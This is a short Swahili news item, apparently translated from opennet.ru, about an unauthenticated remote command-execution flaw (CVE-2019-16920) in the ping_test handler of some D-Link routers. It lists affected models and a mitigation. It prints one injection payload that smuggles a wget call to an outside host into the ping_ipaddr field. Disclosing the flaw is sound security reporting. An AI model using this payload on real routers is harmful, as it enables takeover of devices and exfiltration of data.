Athari inayoweza kutekelezwa kwa mbali katika vipanga njia vya D-Link

Katika vipanga njia vya wireless vya D-Link kutambuliwa udhaifu hatari (CVE-2019–16920), ambayo hukuruhusu kutekeleza msimbo kwa mbali kwenye upande wa kifaa kwa kutuma ombi maalum kwa kidhibiti cha "ping_test", kinachopatikana bila uthibitishaji.

Inashangaza, kwa mujibu wa watengenezaji wa firmware, simu ya "ping_test" inapaswa kutekelezwa tu baada ya uthibitishaji, lakini kwa kweli inaitwa kwa hali yoyote, bila kujali kuingia kwenye interface ya mtandao. Hasa, wakati wa kufikia hati ya apply_sec.cgi na kupitisha kigezo cha "action=ping_test", hati inaelekeza upya kwenye ukurasa wa uthibitishaji, lakini wakati huo huo hufanya kitendo kinachohusishwa na ping_test. Ili kutekeleza msimbo, athari nyingine ilitumika katika ping_test yenyewe, ambayo huita huduma ya ping bila kuangalia vizuri usahihi wa anwani ya IP iliyotumwa kwa majaribio. Kwa mfano, kupiga simu shirika la wget na kuhamisha matokeo ya amri ya "echo 1234" kwa mwenyeji wa nje, taja tu kigezo "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// test.test/?$( echo 1234)".

Athari inayoweza kutekelezwa kwa mbali katika vipanga njia vya D-Link

Uwepo wa mazingira magumu umethibitishwa rasmi katika mifano ifuatayo:

  • DIR-655 na firmware 3.02b05 au zaidi;
  • DIR-866L na firmware 1.03b04 au zaidi;
  • DIR-1565 na firmware 1.01 au zaidi;
  • DIR-652 (hakuna taarifa kuhusu matoleo yenye matatizo ya programu-jalizi yanayotolewa)

Muda wa usaidizi wa miundo hii tayari umekwisha, kwa hivyo D-Link alisema, ambayo haitatoa sasisho kwao ili kuondokana na mazingira magumu, haipendekezi kuzitumia na inashauri kuzibadilisha na vifaa vipya. Kama suluhisho la usalama, unaweza kudhibiti ufikiaji wa kiolesura cha wavuti kwa anwani za IP zinazoaminika pekee.

Baadaye iligunduliwa kuwa hatari pia ilikuwa huathiri mifano DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 na DIR-825, mipango ya kutoa sasisho ambazo bado hazijajulikana.

Chanzo: opennet.ru

Kuongeza maoni